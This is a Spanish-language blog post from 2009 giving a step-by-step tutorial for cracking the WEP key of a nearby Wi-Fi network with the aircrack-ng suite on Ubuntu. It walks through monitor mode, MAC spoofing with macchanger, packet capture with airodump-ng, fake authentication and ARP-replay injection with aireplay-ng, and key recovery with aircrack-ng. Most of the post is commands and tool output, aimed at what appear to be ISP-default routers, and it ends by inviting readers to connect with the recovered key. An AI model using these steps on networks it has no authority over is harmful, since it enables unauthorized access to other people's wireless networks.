martes, 26 de mayo de 2009

wireless Aircrack-ng Atheros 5XXXX UBUNTU 8.10 y 9.04

Bueno he visto mas blogs de estos y creo k aqui me he portado algo tacaño al no mostrarles de donde me he conseguido esta informacion, Bueno en breve comentare unas paginas.

Wifislax.com //Aqui Definitivamente me adentre a este tema

kriptopolis.org //Aqui conoci la primera distro k me motivo a este tema Backtrack ;)

SAn Google // Sin comentarios.

Empezemos esto.

Tengo una atheros e instale driver athk5. Sí!, dije k no explayaria pero que va si alguno tiene el mismo sistema Y tarjeta similar Atheros5XXX puede servirle .

con el procesidimiento que tengo en este Post INstalcion Ath5 Ubuntu Intrepid

Actualizacion: EN ubuntu 9.04 de 32 Bits ya viene el driver de nuestra inalambrica Cargado Y Lista para la auditoria. Les recomiendo pasen por Xubuntu.blog TIps para Jaunty Y demas. La auditoria wireless no se peleea por elsistema que tengas jejeje Solo necesita el driver funcionando ASi k a disfrutar de esta nueva distro.

Sigamos.

shell# uname -r
2.6.27-11-generic

shellJaunty#uname -r

2.6.28-11-server

Datos NEcesarios de la REd (Realmente Necesarios)
Ejemplo
SSID
INFINITUM3539
Bssid
00:1F:B3:88:B3:59"

channel 4

"Si ya les funciona entonces estos datos te los da el airodump-ng la primera vez que lo usaran, asi que no se preocupen "


COsas que deben funcionar e instaladas ya en su PC laptop

macchanger (Vale tan facil como shell#apt-get install macchanger)
Driver Tarjeta Instalado (Si tienes una Atheros 5XXX Ya tengo el manual en el blog ;))
Habilitar MOdo MOnitor (En este tuto usameros airmon-ng Chekate Foros O google para chekar como es con la tuya me refiero tu tarjeta inalambrica)

Inyeccion de Paquetes(Tambien recomendable chekar google para saber si tu tarjeta necesita inyectado especial)

(Tambien para chekar que es un inyectado, vale en forma rapida esto te ayudara bastante de esperar dias capturando paquetes a solo minutos)
Instalar Aircrack-ng (Explico mas adelante)

Paso1.

Ya debe estar instalado tu tarjeta inalambrica y checado que es compatible para inyeccion de paquetes!!
Si ya llegaste a este punto y te preguntas que digo, date una vuelta a google.

Primero: abre una consola:
Código:
#apt-get install aircrack-ng

Paso 2

poner MOdo monitor

#iwconfig

lo no wireless extensions.

eth0 no wireless extensions.

vboxnet0 no wireless extensions.

pan0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:"INFINITUMxxxx"
Mode:Managed Frequency:2.417 GHz Access Point:

..................

Para chekar como se llama tu interfaz wifi en mi caso wlan0


Código:
#airmon-ng stop wlan0

Interface Chipset Driver

wlan0 Atheros ath5k - [phy1]
[mode monitor disable ]


(en mi caso es wlan0, porque la mia se llama así pero tu pon lo que te salga a ti)
y despues
Código:
#airmon-ng start wlan0

Interface Chipset Driver

wlan0 Atheros ath5k - [phy1]

[mode monitor enable in mon0]

Esto es para ponerla en modo monitor y poder captar redes. Vereis que me pone la tarjeta en modo monitor en una tarjeta virtual llamada mon0, así que ahora usare al final de cada code mon0 porque es la que esta en modo monitor.

#ifconfig wlan0 down
PAra poder cambiar con exito la direccion mac
#ifconfig mon0 down
=

#macchanger -m 00:11:22:33:44:55 wlan0
#macchanger -m 00:11:22:33:44:55 mon0

//Bueno hasta aqui si hubiese aparecido el modo monitor en mi wlan0 Entonces no tendria k hacer el paso de mon0

Ya tenemos Nuestra Direccion MAC que es la direccion de nuestro Equipo cambiada,

LEs recomiendo Antes de seguir tener 3 Ventanas Abiertas en SuperUsuario y En la misma carpeta donde capturaran paquetes.

Como por ejemplo

shell# mkdir capturas

# cd capturas //Bueno para k sean mas ordenados y tengan menos paquetes regados por donde sea .

#ifconfig mon0 up
Solo vuelvo a cargar la de modo monitor

En mi caso igualmente Apago la opcion Activar red inalambrica en mi Icono de networkmanager .

Simple por el echo que solo quiero tener trabajando Mi tarjeta en modo Monitor.

Si hasta aqui no ha pasado nada raro, es seguro que todo saldra bien. Ahora que preparamos todoA comenzar se ha dicho>

Paso 3
Código:
#airodump-ng mon0
Ver redes

ES importante esta primera vez k lo lanzamos porque de aqui sacamos los datos BSSID (primera columna), Channel(columna CH), ESSID (Columna donde estan los nombres ej INFINITUM3539)

Guardamos los datos donde gusten Editores o libreta los usaremos en los demas comandos. La recomendacion es que elijan las mas altas dePotencia (Se ordenan las redes por Potencia)Ps obvio para tener una conexion exitosa despues de Crackear la Clave. y por cierto recordar que estamos viendo Crakeo de Claves WEP autenticacion WEP mas adelante hablaremos de las WPA PSK .

#airodump-ng -w ArchivodeCapturas -c canaldeDifusiondelaRedAtacada
Ej #airodump-ng mon0 -w i3539 -c 4
Captura datos del -c canal 4 y los guarda -w a archivo i3539 No olvides tu nombre de archivo.

recordando datos
SSID chanel 4
INFINITUM3539
Bssid
00:1F:B3:88:B3:59"


paso 4

Digamos que esto es lo que se llama inyeccion de paquetes. Cualquier duda esta Google.

Aceleremos captura aireplay-ng. abramos nuestra segunda Consola o solapa con las indicaciones que di de root y carpeta donde se esta llevando el crakeo.

#aireplay-ng -1 0 -e ESSID -a BSSID -h miMAC mon0
ejemplo aireplay-ng -1 0 -e INFINITUM9977 -a 00:0D:72:8C:F0:39 -h 00:11:22:33:44:55 mon0

SI no funciona a la primera No se limiten al copy paste escribanla completa Les aseguro k servira.

Errores comunes: Se escribe mal el SSID nombre de la red, Se escribe mal NUestra MAC(no la cambiamos ) , No hicimos nuestra carpeta para capturas(Lo k pasa es k genera errores en la carpeta home!! ), Pusimos nuestro copy paste Pero se paso un Espacio al final !! hasta eso influye, Errores que ya no tienen que ver con nosotros: PUes esta lejos la red, ocasiona que aveces la autentificacion no tenga exito. PAra esta ultima La solucion es intentar varias veces hasta tener autentificacion Succesful .

Aparecera
Access Succesful :>)

//Un tip , si les falla esta autenticacion a la primera vuelvan a intentar o traten de regresar a la parte de preparativos para que tengan todo Bien.


Paso 4.2
Ahora Aumentamos el filtro con este Comando

#aireplay-ng -3 -b BSSID -h miMAC
aireplay-ng -3 -b 00:0D:72:8C:F0:39 -h 00:11:22:33:44:55 mon0

Las mismas recomendaciones que la anterior. Aunk en esta se da mucho el error que no estamos en la misma carpeta. cheken esto bien. Se supone Tendremos ahora trabajando el airodump-ng trabajando y con el aireplay-ng ya inyectamos paquetes y con esta ultima aceleremos el proceso. Esperaremos a junat suficientes paquetes. Cheken su solapa o consola con airodump-ng en laparte de #data Debe esta aumentando considerablemente mejor que solito airodump-ng sin inyeccion. Y ahora esperar.

Bueno visualizando graficamente tenemos Airodump en La 1ra consola

Aireplay-ng Para autenticacion en la Consola 2

En la consola 2 podemos poner la inyeccion de paquetes del aireplay-ng -3 -b ...

Y ya hasta este punto veremos capturar datos muy rapido por parte del airodump-ng son datos llamados IV's

COn estos Datos Aircrack descifrara de manera Rapida la Clave Wep . Veremos en internet que son las mas faciles de quitar y que por eso se recomienda cambiar de Cifrado y de autenticacion .

Bueno dejando el CHoro Lo k si he visto Diferente es que el programa te pide 80 000 Mil paquetes de datos para realizar la raptura, Otros exageran pidiendo 200000 Mil paquetes, Pero he Vilsto que hasta 30000 Mil paquetes sirven en Redes Por ejemplo Infinitum pork son puros Numeros y la mayoria los predeterminados de Su Router.

Tiempo en general es segun tu tarjeta y segun la distancia Y la interferencia que se haga, Pero en regular de 20 Minutos (Rapidisimo) a 1Hora (Esperando el recomendado 80 000 Paquetes IV's capturados) necesarios para romper satisfactoriamente y Tener la Clave FOUND!

Uso de la 3ra Terminal Y con final feliz! Si tienes mas de 80 000 Mil paquetes (Aunk Si es Inf hasta con 30000, )

Esto se ve en la columna que dice #Data , en el Airodump-ng
paso 5


En la tercera solapa o consola

#aircrack-ng miarchivo*.cap

SI se dan cuenta es el archivo que pusimos en el paso de Airodump mon0 -w miarchivo -c channel

Comienza inspeccionando. no olviden el Asterisco .Ojo con eso!!

Muestra una lista de Redes Monitoreadas y sus respectivos IV's Capturados

escoger la red monitoreada


listo.

MUestreo despues de elegir la red InfinitumXXXX

# BSSID ESSID Encryption

1 00:1F:B3:ED:BB:11 INFINITUMXXXX WEP (390429 IVs)

Choosing first network as target.

Opening i1508-01.cap
Opening i1508-02.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 390429 ivs.
KEY FOUND! [ 70 : xx : xx : xx : xx ]
Decrypted correctly: 100%

Ahi esta la Clave encontrada Apuntenla Y listo!! Pueden COnectarse y escribir una nota aqui en elblog.

Para mas info , Youtube, y google.

Si gustan aportar , adelante..
Suerte con su Auditoria Wireless.


PAGINA ORIGINAL (http://xtornasol512.obolog.com)

0 comentarios: